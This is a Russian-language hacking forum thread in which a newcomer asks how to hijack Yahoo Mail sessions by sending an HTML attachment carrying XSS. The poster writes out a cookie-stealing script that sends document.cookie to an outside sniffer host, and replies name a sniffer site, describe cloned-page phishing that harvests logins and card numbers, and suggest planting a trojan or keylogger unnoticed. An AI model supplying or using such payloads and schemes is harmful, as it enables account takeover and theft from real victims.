Доброе время суток.
Сразу говорю я новенький. :rolleyes:
В поиске не нашол подобной инфы. Про xss прочитал. Видео тожи смотрел о подмене кукав. Вот решил на yahoo.com по тестить.

В общем с моих тестов я увидел:
- Если хтмл страницу выслать то в веб интерфейся она сразу открывается (и скрипты выполняются) :D , тоесть не надо сначало скачивать ее на хард.
Теперь я ищу online снифер который ворует куки, чтоб потом свои заменить на жертвы.
- Как я еще заметил куки (или сесия) весит 12 часов. Тоесть если зайти на почту зделать дисконект с инетом и опять соединиться (при этом остоваясь в веб интерфейсе почты) то сесия продолжается и нет не кокого повторного ре логина :)

Теперь вопрос пройдет ли с куками такая ситуация? :confused:
И как мне стащить куки ? (Античатовский не хочет работать)

Теперь вопрос пройдет ли с куками такая ситуация? :confused:
И как мне стащить куки ? (Античатовский не хочет работать)

Ситуация с куками по идее должна пройти, если сессия не устареет после захода жертвы в свой ящик..

Ищи в инете или ставь свой на своем сайте

http://tools.tehnofil.ru/ ---- снифер вот здезь

Сто раз уже это было описанно! типа копируешь страницу себе на сайт и редирект на нее устанавливаешь. Тогда так лохов богатых разводили на стильных шопах, юзер заходит на страницу, и вводит пароль\логин\номер креды (когда-то он должен его ввести - всегда будет вводить) а все это дерьмо ввиде паролей переходит на скрипт который запишет данные в фаил

Если хтмл страницу выслать то в веб интерфейся она сразу открывается (и скрипты выполняются) , тоесть не надо сначала скачивать ее на хард.
если скрипт выполняется значит ты уже скачал в память страницу и код выполнился в в твоем браузере

А ты уверен что на УаНе нет фильтра на скрипты

tak po pariadku(izvenite translitom pishu, ia shas ne doma).


" http://tools.tehnofil.ru/ " eto snifer malo info tianit s cookie, ili ia ploho razobralsia.


"Сто раз уже это было описанно! типа копируешь страницу себе на сайт и редирект на нее устанавливаешь.
Тогда так лохов богатых разводили на стильных шопах, юзер заходит на страницу, и вводит пароль\логин\номер
креды (когда-то он должен его ввести - всегда будет вводить) а все это дерьмо ввиде паролей переходит на скрипт
который запишет данные в фаил"

Mozhno i Trojana brosit ili keylogger chob zapisival. Nado 4tob zhertva ne znala chto ee imeyut. :)

"если скрипт выполняется значит ты уже скачал в память страницу и код выполнился в в твоем браузере"

imelos drugoe, esli ti otpravil html stranicu v pisme to ona automatom otkroetsia, a ne nado nazhimat otkrit
file. Chto oblegchaet rabotu.

"А ты уверен что на УаНе нет фильтра на скрипты"

tegi ne filtruiutsia. Ia vchera zapihival snifer v telo html stranici, i vse prekrasno rabotalo :)

toest nado podhodiashi sniffer. Eh poidu regit site dlia sniffera.

перепробывал уйму сниферов, но все без результата. Можит я что то не так делаю ? :( Xss как я понемаю заставить человека (по своей или не своей воле) перейти на картинку с снифферам. Я делаю так : создаю хтмл страницу в нее пихаю < script >img = new Image(); img. src = "адресс к снифферу"+escape(document.cookie); </ script>

пробелы специально поставали. Потом отпровляю на адрес адрес@yahoo.com и в браузере открываю писмо. В писме автоматом открывается вложиная хтмл страница и по идеи запускаються скрипты и теги. :confused: Но вот я не пойму почему куки не утегиваются ? :confused: Если кто сталкивался с стакой проблемай то расскажите как ее решить.

З.ы.
Щас еще проверил с подменой куков, то на yahoo эта фишка работает.

Фарминг сейчас самый актуальный способ, почитай в теме разоблочение в важных.